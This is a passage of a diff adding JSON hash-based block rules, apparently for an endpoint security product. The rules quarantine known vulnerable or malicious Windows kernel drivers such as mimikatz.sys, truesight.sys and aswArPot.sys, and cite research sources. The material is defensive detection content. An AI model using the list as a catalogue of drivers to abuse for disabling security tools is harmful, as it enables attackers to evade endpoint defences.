+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462285Z",
+ "creation_date": "2026-03-23T11:45:30.462288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462297Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "caa87fc917ab2ccf9bf2ad715173d74e031626c6bd3c80dca01f27933fec7242",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "534f24ba-8291-52a8-9818-ebcdf85e6f0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816918Z",
+ "creation_date": "2026-03-23T11:45:30.816920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b177164100a31fd01e7f0a24cb0a32015736d3c7c65744c21914a2d4459ef83d",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53523b27-2616-5189-9754-e344bc35fbc4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603813Z",
+ "creation_date": "2026-03-23T11:45:29.603830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.603843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9ed73af3aef69dc1fb91731d6d0a649e93f83d0f07ddb9729d71c2d00ed0801",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53576683-d7cc-560a-914d-19d46271986b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969326Z",
+ "creation_date": "2026-03-23T11:45:29.969328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcb815eb8e9016608d0d917101b6af8c84b96fb709dc0344bceed02cbc4ed258",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "535b3f6b-a52f-5870-b2b6-cea9a1acc571",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620531Z",
+ "creation_date": "2026-03-23T11:45:29.620532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "536a5f69-5ed6-5702-9448-65b3ce0cee3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150053Z",
+ "creation_date": "2026-03-23T11:45:31.150055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dfde0032a696096b94df74e932b6f013cd93f34ec0d41caf30d1b06193b907c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53717789-cd42-53fc-bcd2-47a213d5084f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147806Z",
+ "creation_date": "2026-03-23T11:45:31.147808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b147582875918a84fbf5e07343a6b06bd533d79924c159549d07b63a8b0b8ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "537b981d-754d-5cbc-b4f5-45c203388138",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819731Z",
+ "creation_date": "2026-03-23T11:45:31.819734Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d56a9c9ce41cc5233163b3d82c646eef8eb726c441a3c0c5a46d6f5ca6c35dcf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "537be632-afd9-5b5b-b3ed-c4a6ebb8b6d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976267Z",
+ "creation_date": "2026-03-23T11:45:29.976270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5381555b-044c-59dc-b7a5-1b9d6f6e78d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976835Z",
+ "creation_date": "2026-03-23T11:45:29.976838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b17dce96ba5ae4fbbac4446758dd23ad117864bdb5c4434cb6c157947ec29c1",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53853beb-3e99-5904-8361-2b939bc5f7d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156161Z",
+ "creation_date": "2026-03-23T11:45:31.156163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df7b1b37fb9096d864de7e8a1c136b60c92994de9e3b1f3cb51a0427eb730984",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53963025-fdd0-5008-bc46-d37e4cea4802",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476647Z",
+ "creation_date": "2026-03-23T11:45:30.476650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476659Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ad340c8a4a6e071e15095fd286b600847cd600b7312bd573802f26a73600da7",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "539d7e02-dee4-59dd-ad44-491bd1da746b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817426Z",
+ "creation_date": "2026-03-23T11:45:31.817428Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08ad4c86222f9964418384d93320da01e5779bfd01b0ced82a33696340bca080",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53a0030f-6c03-535f-8076-2f9781d655bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461612Z",
+ "creation_date": "2026-03-23T11:45:30.461615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47bcbe0e7087cde7a9fb01fcec12b5ab185112c8f7f5638543715efa774b0cec",
+ "comment": "Malicious Kernel Driver (aka 5a4fe297c7d42539303137b6d75b150d.sys) [https://www.loldrivers.io/drivers/75b9b0c5-dd3e-4cf3-a693-c80f2feabb6a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53a5fd02-f143-5408-aa1b-d2a45341aef6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612215Z",
+ "creation_date": "2026-03-23T11:45:29.612217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a021532f0ac453256526428ccf3518cdba4c6373cc72f340ba208b6c41b3a9e",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53b42dda-f89e-5e56-9331-484c2a69e399",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487540Z",
+ "creation_date": "2026-03-23T11:45:31.487542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "378cd87cd469810c4933eb81c389bb49ed0df8b0064dfdd4fc69da83a7f95f71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53b75eec-1a13-5d2a-8eb3-375427f39d72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820380Z",
+ "creation_date": "2026-03-23T11:45:31.820383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df5ac5e5d60ea0742544507f31c9e5d8fe56191005722d27253b16bf443ff911",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53b81b2e-4e4e-5562-bc85-929b54af481d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482218Z",
+ "creation_date": "2026-03-23T11:45:31.482222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482263Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "327d978392ef5f9e18c90a38083fde7a58798cb4b83d47c6f991971e8dc50de0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53c1e441-99b0-53c0-9f3a-34a7713a8cde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820807Z",
+ "creation_date": "2026-03-23T11:45:30.820809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8047859a7a886bcf4e666494bd03a6be9ce18e20dc72df0e5b418d180efef250",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53c3e2af-d0ef-52d4-8d49-aae6b9b980c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604014Z",
+ "creation_date": "2026-03-23T11:45:29.604016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7cc798804f07ba04cb1ed9233c5852d147b56df612117c54667cf3ebba975de",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53cc438d-274f-51f4-bf9d-ec3cbd5dbadf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478715Z",
+ "creation_date": "2026-03-23T11:45:31.478719Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478727Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca062e16443d7a58c3bb3c636fb5ba996bfd587b7fe579f0164d9e705b2f94e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53d74c83-28a7-56d9-a392-82769a8651a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604626Z",
+ "creation_date": "2026-03-23T11:45:29.604628Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afb9e6b70f707149e7243e41ffafbdda463da9a890c56091c454df60608efa0f",
+ "comment": "Malicious Kernel Driver (aka daxin_blank3.sys) [https://www.loldrivers.io/drivers/9748d5c8-62dd-474b-a336-0aadb49e5ff9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53d790fb-a44c-50cd-a72e-57526a7e14b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808506Z",
+ "creation_date": "2026-03-23T11:45:31.808510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
